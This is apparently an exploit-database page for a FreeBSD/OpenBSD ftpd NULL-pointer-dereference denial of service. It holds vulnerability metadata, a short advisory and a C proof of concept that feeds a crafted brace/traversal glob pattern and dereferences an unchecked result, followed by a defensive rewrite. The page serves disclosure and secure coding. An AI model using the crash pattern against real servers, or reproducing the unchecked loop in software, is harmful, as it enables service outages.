FreeBSD / OpenBSD ftpd NULL pointer dereference denial of service

CVE: CVE-2005-1410
Category: CWE-476
Price: Not specified
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2010-03-16
CPE: cpe:cpe:/a:freebsd:ftpd
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
EPSS: 0.30232
EPSSP: 0.89477


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010030051

Below is a copy:

/*FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability
 
The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
 
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
 
This issue affects the following releases:
 
FreeBSD 8.0, 6.3, 4.9
OpenBSD 4.5 and 4.6
 
PoC:
*/
 
#include <glob.h>
#include <stdio.h>
#include <string.h>     /* strcpy, memset */
 
#define MAXUSRARGS      100
#define MAXGLOBARGS     1000
 
void do_glob() {
        glob_t gl;
        char **pop;
 
        char buffer[256];
        strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
 
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
        memset(&gl, 0, sizeof(gl));
        /* gl_matchc and GLOB_LIMIT are BSD glob() extensions */
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
        if (glob(buffer, flags, NULL, &gl)) {
                printf("GLOB FAILED!\n");
                return;
        }
        else
                /* Checked form of the loop (tests pop before *pop), left commented out: */
//                for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
                /* Unchecked form: dereferences gl.gl_pathv without testing it for NULL */
                for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
                     pop++) {
                        printf("glob success");
                        return;
                }
        globfree(&gl);
}
 
int main(int argc, char **argv) {
        /* the expansion is run twice */
        do_glob();
        do_glob();
        return 0;
}
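
For contrast with the unchecked loop in the PoC, the following is an added example (not part of the original advisory and not ftpd's own code) of a caller that consumes glob() results defensively. The names expand_pattern, match_cb and MAX_MATCHES are hypothetical, and the flag shims are an assumption so the block builds on a libc without the BSD extensions.

```c
#include <glob.h>
#include <string.h>

/* Extension flags used by the PoC; defined as 0 where the libc lacks them. */
#ifndef GLOB_BRACE
#define GLOB_BRACE 0
#endif
#ifndef GLOB_TILDE
#define GLOB_TILDE 0
#endif
#ifndef GLOB_LIMIT
#define GLOB_LIMIT 0
#endif

#define MAX_MATCHES 1000        /* same value as the PoC's MAXGLOBARGS */

/* Hypothetical callback type: called once per expanded path. */
typedef void (*match_cb)(const char *path, void *ctx);

/*
 * Expand `pattern` and hand at most MAX_MATCHES - 1 paths to `cb`.
 * Returns the number of paths delivered, or -1 if glob() reports an error.
 */
int expand_pattern(const char *pattern, match_cb cb, void *ctx)
{
        glob_t gl;
        int n = 0;
        int flags = GLOB_BRACE | GLOB_NOCHECK | GLOB_TILDE | GLOB_LIMIT;

        memset(&gl, 0, sizeof(gl));
        if (glob(pattern, flags, NULL, &gl) != 0) {
                globfree(&gl);  /* partial results may have been allocated */
                return -1;
        }
        /* A zero return is not taken as proof that gl_pathv is set:
         * test the vector itself, then bound the walk by gl_pathc and the cap. */
        for (size_t i = 0; gl.gl_pathv != NULL && i < gl.gl_pathc; i++) {
                if (gl.gl_pathv[i] == NULL || n >= MAX_MATCHES - 1)
                        break;
                if (cb != NULL)
                        cb(gl.gl_pathv[i], ctx);
                n++;
        }
        globfree(&gl);          /* release on every exit path */
        return n;
}
```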


